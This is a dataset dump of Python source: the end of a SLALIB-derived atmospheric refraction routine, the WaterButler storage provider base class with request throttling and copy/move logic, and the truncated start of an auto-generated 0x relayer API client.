    TOL = min(max(abs(EPS), 1.0e-12), 0.1) / 2.0
    # Decide whether optical/IR or radio case - switch at 100 microns.
    OPTIC = WLOK <= 100.0
    # Set up model atmosphere parameters defined at the observer.
    WLSQ = WLOK * WLOK
    GB = 9.784 * (1.0 - 0.0026 * math.cos(PHI + PHI) - 0.00000028 * HMOK)
    if OPTIC:
        A = (287.604 + (1.6288 + 0.0136 / WLSQ) / WLSQ) * 273.15e-6 / 1013.25
    else:
        A = 77.624e-6
    GAMAL = (GB * DMD) / GCR
    GAMMA = GAMAL / ALPHA
    GAMM2 = GAMMA - 2.0
    DELM2 = DELTA - 2.0
    TDC = TDKOK - 273.15
    # Saturation water-vapour pressure (Gill 1982).
    PSAT = 10.0**((0.7859 + 0.03477 * TDC) / (1.0 + 0.00412 * TDC))
    PSAT *= (1.0 + PMBOK * (4.5e-6 + 6e-10 * TDC * TDC))
    if (PMBOK > 0.0):
        PWO = RHOK * PSAT / (1.0 - (1.0 - RHOK) * PSAT / PMBOK)
    else:
        PWO = 0.0
    W = PWO * (1.0 - DMW / DMD) * GAMMA / (DELTA - GAMMA)
    C1 = A * (PMBOK + W) / TDKOK
    if OPTIC:
        C2 = (A * W + 11.2684e-6 * PWO) / TDKOK
    else:
        C2 = (A * W + 12.92e-6 * PWO) / TDKOK
    C3 = (GAMMA - 1.0) * ALPHA * C1 / TDKOK
    C4 = (DELTA - 1.0) * ALPHA * C2 / TDKOK
    if OPTIC:
        C5 = 0.0
        C6 = 0.0
    else:
        C5 = 371897e-6 * PWO / TDKOK
        C6 = C5 * DELM2 * ALPHA / (TDKOK * TDKOK)
    # Conditions at the observer.
    R0 = S + HMOK
    TEMPO, DN0, RDNDR0 = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
                              C1, C2, C3, C4, C5, C6, R0)
    SK0 = DN0 * R0 * math.sin(ZOBS2)
    F0 = refi(R0, DN0, RDNDR0)
    # Conditions in the troposphere at the tropopause.
    RT = S + HT
    TT, DNT, RDNDRT = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
                           C1, C2, C3, C4, C5, C6, RT)
    SINE = SK0 / (RT * DNT)
    ZT = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE, 0.0)))
    FT = refi(RT, DNT, RDNDRT)
    # Conditions in the stratosphere at the tropopause.
    DNTS, RDNDRP = atms(RT, TT, DNT, GAMAL, RT)
    SINE = SK0 / (RT * DNTS)
    ZTS = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE,0.0)))
    FTS = refi(RT, DNTS, RDNDRP)
    # Conditions at the stratosphere limit.
    RS = S + HS
    DNS, RDNDRS = atms(RT, TT, DNT, GAMAL, RS)
    SINE = SK0 / (RS * DNS)
    ZS = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE, 0.0)))
    FS = refi(RS, DNS, RDNDRS)
    # Integrate the refraction integral in two parts;  first in the
    # troposphere (K=1), then in the stratosphere (K=2).
    # Initialize previous refraction to ensure at least two iterations.
    REFOLD = 1.0e6
    # Start off with 8 strips for the troposphere integration, and then
    # use the final troposphere value for the stratosphere integration,
    # which tends to need more strips.
    IS = 8
    # Troposphere then stratosphere.
    for K in [1,2]:
        # Start Z, Z range, and start and end values.
        if K == 1:
            Z0 = ZOBS2
            ZRANGE = ZT - Z0
            FB = F0
            FF = FT
        else:
            Z0 = ZTS
            ZRANGE = ZS - Z0
            FB = FTS
            FF = FS
        # Sums of odd and even values.
        FO = 0.0
        FE = 0.0
        # First time through the loop we have to do every point.
        N = 1
        # Start of iteration loop (terminates at specified precision).
        LOOP = True
        while LOOP:
            # Strip width.
            H = ZRANGE / float(IS)
            # Initialize distance from Earth centre for quadrature pass.
            if K == 1:
                R = R0
            else:
                R = RT
            # One pass (no need to compute evens after first time).
            for I in range(1, IS, N):
                # Sine of observed zenith distance.
                SZ = math.sin(Z0 + H * float(I))
                # Find R (to the nearest metre, maximum four iterations of
                # Newton's method on the ray invariant n*r*sin(z) = const).
                if SZ > 1e-20:
                    W = SK0 / SZ
                    RG = R
                    DR = 1e6
                    J = 0
                    while (abs(DR) > 1.0) and (J < 4):
                        J = J + 1
                        if K == 1:
                            TG, DN, RDNDR = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
                                                 C1, C2, C3, C4, C5, C6, RG)
                        else:
                            DN, RDNDR = atms(RT, TT, DNT, GAMAL, RG)
                        DR = (RG * DN - W) / (DN + RDNDR)
                        RG = RG - DR
                    R = RG
                # Find the refractive index and integrand at R.
                if K == 1:
                    T, DN, RDNDR = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
                                        C1, C2, C3, C4, C5, C6, R)
                else:
                    DN,RDNDR = atms(RT, TT, DNT, GAMAL, R)
                F = refi(R, DN, RDNDR)
                # Accumulate odd and (first time only) even values.
                if (N == 1) and ((I % 2) == 0):
                    FE = FE + F
                else:
                    FO = FO + F
            # Evaluate the integrand using Simpson's Rule.
            REFP = H * (FB + 4.0 * FO + 2.0 * FE + FF) / 3.0
            # Has the required precision been achieved?
            if (abs(REFP - REFOLD) > TOL):
                # No: prepare for next iteration.
                # Save current value for convergence test.
                REFOLD = REFP
                # Double the number of strips.
                IS = IS + IS
                # Sum of all current values = sum of next pass's even values.
                FE = FE + FO
                # Prepare for new odd values.
                FO = 0.0
                # Skip even values next time.
                N = 2
            else:
                # Yes: save troposphere component and terminate the loop.
                if (K == 1):
                    REFT = REFP
                LOOP = False
    # Result: troposphere plus stratosphere contributions, signed to match
    # the (range-reduced) input.
    REF = REFT + REFP
    if (ZOBS1 < 0.0):
        REF = -REF
    return REF
def atmt(R0, T0, ALPHA, GAMM2, DELM2, C1, C2, C3, C4, C5, C6, R):
    """
    Internal helper used by refro: refractive index and derivative with
    respect to height for the troposphere.

    Given:
      R0      d    height of observer from centre of the Earth (metre)
      T0      d    temperature at the observer (deg K)
      ALPHA   d    alpha          )
      GAMM2   d    gamma minus 2  )  see HMNAO paper
      DELM2   d    delta minus 2  )
      C1..C6  d    precomputed terms from the refro source
      R       d    current distance from the centre of the Earth (metre)

    Returned (tuple):
      T       d    temperature at R (deg K)
      DN      d    refractive index at R
      RDNDR   d    R * rate the refractive index is changing at R

    In the optical case C5 and C6 are zero.

    Derived from P.T.Wallace's SLALIB routine (internal ATMT).
    """
    # Linear lapse-rate temperature at height R, clamped to a sane range.
    T = max(min(T0 - ALPHA * (R - R0), 320.0), 100.0)
    ratio = T / T0
    ratio_gm2 = ratio**GAMM2
    ratio_dm2 = ratio**DELM2
    DN = 1.0 + (C1 * ratio_gm2 - (C2 - C5 / T) * ratio_dm2) * ratio
    RDNDR = R * (-C3 * ratio_gm2 + (C4 - C6 / ratio) * ratio_dm2)
    return T, DN, RDNDR
def atms(RT, TT, DNT, GAMAL, R):
    """
    Internal helper used by refro: refractive index and derivative with
    respect to height for the (isothermal, exponential) stratosphere.

    Given:
      RT     d    height of tropopause from centre of the Earth (metre)
      TT     d    temperature at the tropopause (deg K)
      DNT    d    refractive index at the tropopause
      GAMAL  d    constant of the atmospheric model = G*MD/R
      R      d    current distance from the centre of the Earth (metre)

    Returned (tuple):
      DN     d    refractive index at R
      RDNDR  d    R * rate the refractive index is changing at R

    Derived from P.T.Wallace's SLALIB routine (internal ATMS).
    """
    # Refractivity decays exponentially above the tropopause.
    B = GAMAL / TT
    refractivity = (DNT - 1.0) * math.exp(-B * (R - RT))
    DN = 1.0 + refractivity
    RDNDR = -R * B * refractivity
    return DN, RDNDR
def da1p(ANGLE):
    """
    Normalize an angle into the range +/- pi (double precision).

    Given:
      ANGLE  dp  the angle in radians

    Returns ANGLE expressed in the range +/- pi.

    Note: the Fortran original (sla_DA1P) uses MOD(), which truncates toward
    zero so the remainder carries the sign of ANGLE.  Python's % operator
    instead follows the sign of the divisor, which made the first translation
    return wildly wrong values for negative angles (e.g. -pi/2 -> ~3.5*pi).
    math.fmod() reproduces the Fortran semantics.

    Derived from P.T.Wallace's SLALIB.
    """
    DPI = 3.141592653589793238462643
    D2PI = 6.283185307179586476925287
    # fmod, not %: for negative ANGLE the remainder must stay negative so the
    # sign-matched wrap below is correct.
    slDA1P = math.fmod(ANGLE, D2PI)
    if (abs(slDA1P) >= DPI):
        slDA1P = slDA1P - math.copysign(D2PI, ANGLE)
    return slDA1P
| 34.875494 | 81 | 0.576132 |
45adbece26d8f636297e7907914b77581dfacfad | 23,534 | py | Python | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | import abc
import time
import asyncio
import logging
import weakref
import functools
import itertools
from urllib import parse
import furl
import aiohttp
from waterbutler import settings
from waterbutler.core import streams
from waterbutler.core import exceptions
from waterbutler.core.utils import ZipStreamGenerator
from waterbutler.core.utils import RequestHandlerContext
# Module-level logger for provider operations.
logger = logging.getLogger(__name__)
# Per-event-loop throttle state for the @throttle decorator below; weak keys
# let an entry disappear when its event loop is garbage collected.
_THROTTLES = weakref.WeakKeyDictionary()
def throttle(concurrency=10, interval=1):
    """Decorator factory that rate-limits an async callable.

    Allows up to ``concurrency`` calls per ``interval`` seconds per event
    loop; once the budget is used up inside a window, all callers block on a
    shared :class:`asyncio.Event` until the remainder of the interval has
    elapsed.

    :param int concurrency: maximum calls permitted per interval
    :param int interval: length of the throttle window (seconds)
    """
    def _throttle(func):
        @functools.wraps(func)
        async def wrapped(*args, **kwargs):
            loop = asyncio.get_event_loop()
            if loop not in _THROTTLES:
                # State is the mutable list [count, last_call, event] so the
                # updates below persist across calls.  The original stored an
                # immutable tuple and only mutated locals, so the counter
                # never accumulated and throttling never engaged.
                state = [0, time.time(), asyncio.Event()]
                _THROTTLES[loop] = state
                state[2].set()
            else:
                state = _THROTTLES[loop]
            await state[2].wait()
            state[0] += 1
            if state[0] > concurrency:
                state[0] = 0
                if (time.time() - state[1]) < interval:
                    # Budget exhausted inside the window: make everyone wait
                    # out the remainder of the interval.
                    state[2].clear()
                    await asyncio.sleep(interval - (time.time() - state[1]))
                    state[2].set()
                state[1] = time.time()
            return (await func(*args, **kwargs))
        return wrapped
    return _throttle
def build_url(base, *segments, **query):
    """Compose a URL from ``base``, extra path ``segments`` and ``query`` args.

    Path segments already present on ``base`` are kept, each segment is
    stripped of surrounding slashes and percent-quoted (furl requires
    everything quoted or nothing, so we pre-quote uniformly), and empty
    segments are dropped.
    """
    url = furl.furl(base)
    candidates = itertools.chain(url.path.segments, segments)
    quoted = (parse.quote(part.strip('/')) for part in candidates)
    # Drop empties; the list() also forces the lazy generator to run.
    url.path.segments = [part for part in quoted if part]
    url.args = query
    return url.url
class BaseProvider(metaclass=abc.ABCMeta):
    """The base class for all providers. Every provider must, at the least, implement all abstract
    methods in this class.
    .. note::
        When adding a new provider you must add it to setup.py's
        `entry_points` under the `waterbutler.providers` key formatted
        as: `<provider name> = waterbutler.providers.yourprovider:<FullProviderName>`
        Keep in mind that `yourprovider` modules must export the provider class
    """
    # Root URL of the remote service's API; subclasses override this and
    # ``build_url()`` composes request URLs from it.
    BASE_URL = None
def __init__(self, auth, credentials, settings, retry_on={408, 502, 503, 504}):
"""
:param dict auth: Information about the user this provider will act on the behalf of
:param dict credentials: The credentials used to authenticate with the provider,
ofter an OAuth 2 token
:param dict settings: Configuration settings for this provider,
often folder or repo
"""
self._retry_on = retry_on
self.auth = auth
self.credentials = credentials
self.settings = settings
    @abc.abstractproperty
    def NAME(self):
        """The short identifying name of this provider (e.g. ``'github'``).

        Must be overridden by every concrete provider subclass.
        """
        raise NotImplementedError
def __eq__(self, other):
try:
return (
type(self) == type(other) and
self.credentials == other.credentials
)
except AttributeError:
return False
def serialized(self):
return {
'name': self.NAME,
'auth': self.auth,
'settings': self.settings,
'credentials': self.credentials,
}
    def build_url(self, *segments, **query):
        """A nice wrapper around furl, builds urls based on self.BASE_URL.
        Delegates to the module-level :func:`build_url` with this provider's
        ``BASE_URL`` as the base.
        :param tuple \*segments: A tuple of strings joined into /foo/bar/..
        :param dict \*\*query: A dictionary that will be turned into query parameters ?foo=bar
        :rtype: str
        """
        return build_url(self.BASE_URL, *segments, **query)
    @property
    def default_headers(self):
        """Headers to be included with every request.
        Commonly OAuth headers or Content-Type; the base implementation
        returns an empty dict and subclasses override as needed.
        """
        return {}
def build_headers(self, **kwargs):
headers = self.default_headers
headers.update(kwargs)
return {
key: value
for key, value in headers.items()
if value is not None
}
    @throttle()
    async def make_request(self, method, url, *args, **kwargs):
        """A wrapper around :func:`aiohttp.request`. Inserts default headers.
        :param str method: The HTTP method
        :param str url: The url to send the request to; may also be a callable
            returning the url, evaluated lazily just before each request
        :keyword range: An optional tuple (start, end) that is transformed into a Range header
        :keyword expects: An optional tuple of HTTP status codes as integers raises an exception
            if the returned status code is not in it.
        :type expects: tuple of ints
        :param Exception throws: The exception to be raised from expects
        :param int retry: number of retries allowed on a retryable error (default 2)
        :param tuple \*args: args passed to :func:`aiohttp.request`
        :param dict \*\*kwargs: kwargs passed to :func:`aiohttp.request`
        :rtype: :class:`aiohttp.Response`
        :raises ProviderError: Raised if expects is defined
        """
        kwargs['headers'] = self.build_headers(**kwargs.get('headers', {}))
        # _retry keeps the original budget so the backoff below can grow as
        # attempts are consumed; retry counts down to zero.
        retry = _retry = kwargs.pop('retry', 2)
        # NOTE: `range` shadows the builtin locally; the builtin is not used below.
        range = kwargs.pop('range', None)
        expects = kwargs.pop('expects', None)
        throws = kwargs.pop('throws', exceptions.ProviderError)
        if range:
            kwargs['headers']['Range'] = self._build_range_header(range)
        if callable(url):
            url = url()
        while retry >= 0:
            try:
                response = await aiohttp.request(method, url, *args, **kwargs)
                if expects and response.status not in expects:
                    raise (await exceptions.exception_from_response(response, error=throws, **kwargs))
                return response
            except throws as e:
                # Only retry codes in self._retry_on (e.g. 408/502/503/504),
                # with a linearly increasing sleep: 2s, 4s, ...
                if retry <= 0 or e.code not in self._retry_on:
                    raise
                await asyncio.sleep((1 + _retry - retry) * 2)
                retry -= 1
    def request(self, *args, **kwargs):
        """Like :meth:`make_request`, but returns an async context manager that
        releases the response on exit.
        """
        return RequestHandlerContext(self.make_request(*args, **kwargs))
    async def move(self, dest_provider, src_path, dest_path, rename=None, conflict='replace', handle_naming=True):
        """Moves a file or folder from the current provider to the specified one.
        Performs a copy and then a delete; uses :func:`BaseProvider.intra_move`
        instead when the providers support a direct move between themselves.
        :param BaseProvider dest_provider: The provider to move to
        :param WaterButlerPath src_path: The path of the entity being moved
        :param WaterButlerPath dest_path: The path to move to or into
        :param str rename: Optional new name for the moved entity
        :param str conflict: Conflict resolution strategy ('replace', 'keep', 'warn')
        :param bool handle_naming: Whether to resolve the final name/conflicts here
        :rtype: (metadata, bool created)
        """
        args = (dest_provider, src_path, dest_path)
        kwargs = {'rename': rename, 'conflict': conflict}
        if handle_naming:
            dest_path = await dest_provider.handle_naming(
                src_path,
                dest_path,
                rename=rename,
                conflict=conflict,
            )
            # Naming is resolved now, so recursive calls must not redo it.
            args = (dest_provider, src_path, dest_path)
            kwargs = {}
        # files and folders shouldn't overwrite themselves
        if (
            self.shares_storage_root(dest_provider) and
            src_path.materialized_path == dest_path.materialized_path
        ):
            raise exceptions.OverwriteSelfError(src_path)
        if self.can_intra_move(dest_provider, src_path):
            return (await self.intra_move(*args))
        if src_path.is_dir:
            # Recurse over folder contents with move itself.
            metadata, created = await self._folder_file_op(self.move, *args, **kwargs)
        else:
            metadata, created = await self.copy(*args, handle_naming=False, **kwargs)
        # Copy succeeded; remove the source to complete the move.
        await self.delete(src_path)
        return metadata, created
    async def copy(self, dest_provider, src_path, dest_path, rename=None, conflict='replace', handle_naming=True):
        """Copies a file or folder from the current provider to the specified one.
        Uses :func:`BaseProvider.intra_copy` when available; otherwise folders
        recurse via :func:`_folder_file_op` and files stream download->upload.
        :param BaseProvider dest_provider: The provider to copy to
        :param WaterButlerPath src_path: The path of the entity being copied
        :param WaterButlerPath dest_path: The path to copy to or into
        :param str rename: Optional new name for the copied entity
        :param str conflict: Conflict resolution strategy ('replace', 'keep', 'warn')
        :param bool handle_naming: Whether to resolve the final name/conflicts here
        :rtype: (metadata, bool created)
        """
        args = (dest_provider, src_path, dest_path)
        kwargs = {'rename': rename, 'conflict': conflict, 'handle_naming': handle_naming}
        if handle_naming:
            dest_path = await dest_provider.handle_naming(
                src_path,
                dest_path,
                rename=rename,
                conflict=conflict,
            )
            # Naming is resolved now, so recursive calls must not redo it.
            args = (dest_provider, src_path, dest_path)
            kwargs = {}
        # files and folders shouldn't overwrite themselves
        if (
            self.shares_storage_root(dest_provider) and
            src_path.materialized_path == dest_path.materialized_path
        ):
            raise exceptions.OverwriteSelfError(src_path)
        if self.can_intra_copy(dest_provider, src_path):
            return (await self.intra_copy(*args))
        if src_path.is_dir:
            return (await self._folder_file_op(self.copy, *args, **kwargs))
        download_stream = await self.download(src_path)
        # Some providers attach the real filename to the stream; honor it.
        if getattr(download_stream, 'name', None):
            dest_path.rename(download_stream.name)
        return (await dest_provider.upload(download_stream, dest_path))
    async def _folder_file_op(self, func, dest_provider, src_path, dest_path, **kwargs):
        """Recursively apply func to src/dest path.
        Called from: func: copy and move if src_path.is_dir.
        Calls: func: dest_provider.delete and notes result for bool: created
        func: dest_provider.create_folder
        func: dest_provider.revalidate_path
        func: self.metadata
        :param coroutine func: to be applied to src/dest path (self.copy or self.move)
        :param *Provider dest_provider: Destination provider
        :param *ProviderPath src_path: Source path
        :param *ProviderPath dest_path: Destination path
        :rtype: (folder metadata with .children populated, bool created)
        """
        assert src_path.is_dir, 'src_path must be a directory'
        assert asyncio.iscoroutinefunction(func), 'func must be a coroutine'
        # Replace any existing destination folder; a 404 means it was absent,
        # in which case the operation creates something new.
        try:
            await dest_provider.delete(dest_path)
            created = False
        except exceptions.ProviderError as e:
            if e.code != 404:
                raise
            created = True
        folder = await dest_provider.create_folder(dest_path, folder_precheck=False)
        dest_path = await dest_provider.revalidate_path(dest_path.parent, dest_path.name, folder=dest_path.is_dir)
        folder.children = []
        items = await self.metadata(src_path)
        # Process children in batches of OP_CONCURRENCY concurrent tasks.
        for i in range(0, len(items), settings.OP_CONCURRENCY):
            futures = []
            for item in items[i:i + settings.OP_CONCURRENCY]:
                futures.append(asyncio.ensure_future(
                    func(
                        dest_provider,
                        # TODO figure out a way to cut down on all the requests made here
                        (await self.revalidate_path(src_path, item.name, folder=item.is_folder)),
                        (await dest_provider.revalidate_path(dest_path, item.name, folder=item.is_folder)),
                        handle_naming=False,
                    )
                ))
                if item.is_folder:
                    # Subfolders are awaited immediately rather than batched --
                    # presumably to serialize nested folder creation; confirm
                    # before changing.
                    await futures[-1]
            if not futures:
                continue
            done, _ = await asyncio.wait(futures, return_when=asyncio.FIRST_EXCEPTION)
            for fut in done:
                folder.children.append(fut.result()[0])
        return folder, created
    async def handle_naming(self, src_path, dest_path, rename=None, conflict='replace'):
        """Given a WaterButlerPath and the desired name, handle any potential naming issues.
        i.e.:
        cp /file.txt /folder/           ->    /folder/file.txt
        cp /folder/ /folder/            ->    /folder/folder/
        cp /file.txt /folder/file.txt   ->    /folder/file.txt
        cp /file.txt /folder/file.txt   ->    /folder/file (1).txt
        cp /file.txt /folder/doc.txt    ->    /folder/doc.txt
        :param WaterButlerPath src_path: The object that is being copied
        :param WaterButlerPath dest_path: The path that is being copied to or into
        :param str rename: The desired name of the resulting path, may be incremented
        :param str conflict: The conflict resolution strategy, replace or keep
        Returns: WaterButlerPath dest_path: The path of the desired result.
        """
        if src_path.is_dir and dest_path.is_file:
            # Cant copy a directory to a file
            raise ValueError('Destination must be a directory if the source is')
        if not dest_path.is_file:
            # Directories always are going to be copied into
            # cp /folder1/ /folder2/ -> /folder1/folder2/
            dest_path = await self.revalidate_path(
                dest_path,
                rename or src_path.name,
                folder=src_path.is_dir
            )
        # Resolve name collisions per the requested strategy.
        dest_path, _ = await self.handle_name_conflict(dest_path, conflict=conflict)
        return dest_path
    def can_intra_copy(self, other, path=None):
        """Indicates if a quick copy can be performed between the current provider and `other`.
        .. note::
            Defaults to False; providers that can copy server-side override this.
        :param waterbutler.core.provider.BaseProvider other: The provider to check against
        :param path: The path being copied (unused by the default implementation)
        :rtype: bool
        """
        return False
    def can_intra_move(self, other, path=None):
        """Indicates if a quick move can be performed between the current provider and `other`.
        .. note::
            Defaults to False; providers that can move server-side override this.
        :param waterbutler.core.provider.BaseProvider other: The provider to check against
        :param path: The path being moved (unused by the default implementation)
        :rtype: bool
        """
        return False
    def intra_copy(self, dest_provider, source_path, dest_path):
        """If the provider supports copying files and/or folders within itself by some means other
        than download/upload, then ``can_intra_copy`` should return ``True``.  This method will
        implement the copy.  It accepts the destination provider, a source path, and the
        destination path.  Returns the metadata for the newly created file and a boolean indicating
        whether the copied entity is completely new (``True``) or overwrote a previously-existing
        file (``False``).
        Subclasses that return ``True`` from ``can_intra_copy`` must override this.
        :param BaseProvider dest_provider: a provider instance for the destination
        :param WaterButlerPath source_path: the Path of the entity being copied
        :param WaterButlerPath dest_path: the Path of the destination being copied to
        :rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
        """
        raise NotImplementedError
async def intra_move(self, dest_provider, src_path, dest_path):
"""If the provider supports moving files and/or folders within itself by some means other
than download/upload/delete, then ``can_intra_move`` should return ``True``. This method
will implement the move. It accepts the destination provider, a source path, and the
destination path. Returns the metadata for the newly created file and a boolean indicating
whether the moved entity is completely new (``True``) or overwrote a previously-existing
file (``False``).
:param BaseProvider dest_provider: a provider instance for the destination
:param WaterButlerPath source_path: the Path of the entity being moved
:param WaterButlerPath dest_path: the Path of the destination being moved to
:rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
"""
data, created = await self.intra_copy(dest_provider, src_path, dest_path)
await self.delete(src_path)
return data, created
async def exists(self, path, **kwargs):
"""Check for existence of WaterButlerPath
Attempt to retrieve provider metadata to determine existence of a WaterButlerPath. If
successful, will return the result of `self.metadata()` which may be `[]` for empty
folders.
:param WaterButlerPath path: path to check for
:rtype: (`self.metadata()` or False)
"""
try:
return (await self.metadata(path, **kwargs))
except exceptions.NotFoundError:
return False
except exceptions.MetadataError as e:
if e.code != 404:
raise
return False
async def handle_name_conflict(self, path, conflict='replace', **kwargs):
"""Check WaterButlerPath and resolve conflicts
Given a WaterButlerPath and a conflict resolution pattern determine
the correct file path to upload to and indicate if that file exists or not
:param WaterButlerPath path: Desired path to check for conflict
:param str conflict: replace, keep, warn
:rtype: (WaterButlerPath, provider.metadata() or False)
:raises: NamingConflict
"""
exists = await self.exists(path, **kwargs)
if (not exists and not exists == []) or conflict == 'replace':
return path, exists
if conflict == 'warn':
raise exceptions.NamingConflict(path)
while True:
path.increment_name()
test_path = await self.revalidate_path(
path.parent,
path.name,
folder=path.is_dir
)
exists = await self.exists(test_path, **kwargs)
if not (exists or exists == []):
break
return path, False
async def revalidate_path(self, base, path, folder=False):
"""Take a path and a base path and build a WaterButlerPath representing `/base/path`. For
id-based providers, this will need to lookup the id of the new child object.
:param WaterButlerPath base: The base folder to look under
:param str path: the path of a child of `base`, relative to `base`
:param bool folder: whether the returned WaterButlerPath should represent a folder
:rtype: WaterButlerPath
"""
return base.child(path, folder=folder)
async def zip(self, path, **kwargs):
"""Streams a Zip archive of the given folder
:param str path: The folder to compress
"""
metadata = await self.metadata(path)
if path.is_file:
metadata = [metadata]
path = path.parent
return streams.ZipStreamReader(ZipStreamGenerator(self, path, *metadata))
def shares_storage_root(self, other):
"""Returns True if ``self`` and ``other`` both point to the same storage root. Used to
detect when a file move/copy action might result in the file overwriting itself. Most
providers have enough uniquely identifing information in the settings to detect this,
but some providers may need to override this to do further detection.
:param BaseProvider other: another provider instance to compare with
:returns bool: True if both providers use the same storage root.
"""
return self.NAME == other.NAME and self.settings == other.settings
@abc.abstractmethod
def can_duplicate_names(self):
"""Returns True if a file and a folder in the same directory can have identical names."""
raise NotImplementedError
@abc.abstractmethod
def download(self, **kwargs):
"""Download a file from this provider.
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`waterbutler.core.streams.ResponseStreamReader`
:raises: :class:`waterbutler.core.exceptions.DownloadError`
"""
raise NotImplementedError
@abc.abstractmethod
def upload(self, stream, **kwargs):
"""Uploads the given stream to the provider. Returns the metadata for the newly created
file and a boolean indicating whether the file is completely new (``True``) or overwrote
a previously-existing file (``False``)
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
:raises: :class:`waterbutler.core.exceptions.DeleteError`
"""
raise NotImplementedError
@abc.abstractmethod
def delete(self, **kwargs):
"""
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`None`
:raises: :class:`waterbutler.core.exceptions.DeleteError`
"""
raise NotImplementedError
@abc.abstractmethod
def metadata(self, **kwargs):
"""Get metdata about the specified resource from this provider. Will be a :class:`list`
if the resource is a directory otherwise an instance of
:class:`waterbutler.core.metadata.BaseFileMetadata`
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`waterbutler.core.metadata.BaseMetadata`
:rtype: :class:`list` of :class:`waterbutler.core.metadata.BaseMetadata`
:raises: :class:`waterbutler.core.exceptions.MetadataError`
"""
raise NotImplementedError
@abc.abstractmethod
def validate_v1_path(self, path, **kwargs):
"""API v1 requires that requests against folder endpoints always end with a slash, and
requests against files never end with a slash. This method checks the provider's metadata
for the given id and throws a 404 Not Found if the implicit and explicit types don't
match. This method duplicates the logic in the provider's validate_path method, but
validate_path must currently accomodate v0 AND v1 semantics. After v0's retirement, this
method can replace validate_path.
:param str path: user-supplied path to validate
:rtype: :class:`waterbutler.core.path`
:raises: :class:`waterbutler.core.exceptions.NotFoundError`
"""
raise NotImplementedError
    @abc.abstractmethod
    def validate_path(self, path, **kwargs):
        """Parse a user-supplied path string into a WaterButlerPath.

        Unlike :meth:`validate_v1_path`, this must accommodate both v0 and
        v1 API semantics (see that method's docstring).

        :param str path: user-supplied path to validate
        :rtype: :class:`waterbutler.core.path`
        """
        raise NotImplementedError
def path_from_metadata(self, parent_path, metadata):
return parent_path.child(metadata.name, _id=metadata.path.strip('/'), folder=metadata.is_folder)
def revisions(self, **kwargs):
return [] # TODO Raise 405 by default h/t @rliebz
def create_folder(self, path, **kwargs):
"""Create a folder in the current provider at `path`. Returns a `BaseFolderMetadata` object
if successful. May throw a 409 Conflict if a directory with the same name already exists.
:param str path: user-supplied path to create. must be a directory.
:param boolean precheck_folder: flag to check for folder before attempting create
:rtype: :class:`waterbutler.core.metadata.BaseFolderMetadata`
:raises: :class:`waterbutler.core.exceptions.FolderCreationError`
"""
raise exceptions.ProviderError({'message': 'Folder creation not supported.'}, code=405)
def _build_range_header(self, slice_tup):
start, end = slice_tup
return 'bytes={}-{}'.format(
'' if start is None else start,
'' if end is None else end
)
def __repr__(self):
# Note: credentials are not included on purpose.
return ('<{}({}, {})>'.format(self.__class__.__name__, self.auth, self.settings))
| 40.091993 | 114 | 0.633849 |
4e1fac032bbf33462ef2282a0675c8904ea80a2f | 45,014 | py | Python | python-packages/sra_client/sra_client/api/default_api.py | dave4506/0x-monorepo | fdcad84cee45781a06cab6b6b17f4a48c275d713 | [
"Apache-2.0"
] | 2 | 2019-04-14T01:03:32.000Z | 2019-04-14T01:03:33.000Z | python-packages/sra_client/sra_client/api/default_api.py | Lambda07/0x-monorepo | c78a60299053f0ec825bf34dd3ea0cea7bb9365b | [
"Apache-2.0"
] | null | null | null | python-packages/sra_client/sra_client/api/default_api.py | Lambda07/0x-monorepo | c78a60299053f0ec825bf34dd3ea0cea7bb9365b | [
"Apache-2.0"
] | 1 | 2021-05-02T08:24:10.000Z | 2021-05-02T08:24:10.000Z | # coding: utf-8
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sra_client.api_client import ApiClient
from sra_client.models.relayer_api_order_config_payload_schema import (
RelayerApiOrderConfigPayloadSchema,
)
class DefaultApi(object):
"""Default API for SRA compliant 0x relayers."""
# NOTE: This class is auto generated by OpenAPI Generator
# Ref: https://openapi-generator.tech
# Do not edit the class manually.
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_asset_pairs(self, **kwargs):
"""get_asset_pairs
Retrieves a list of available asset pairs and the information
required to trade them (in any order). Setting only `assetDataA` or
`assetDataB` returns pairs filtered by that asset only.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_asset_pairs(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str asset_data_a: The assetData value for the first asset in the pair.
:param str asset_data_b: The assetData value for the second asset in the pair.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiAssetDataPairsResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_asset_pairs_with_http_info(**kwargs)
else:
(data) = self.get_asset_pairs_with_http_info(**kwargs)
return data
def get_asset_pairs_with_http_info(self, **kwargs):
"""get_asset_pairs
Retrieves a list of available asset pairs and the information
required to trade them (in any order). Setting only `assetDataA` or
`assetDataB` returns pairs filtered by that asset only.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
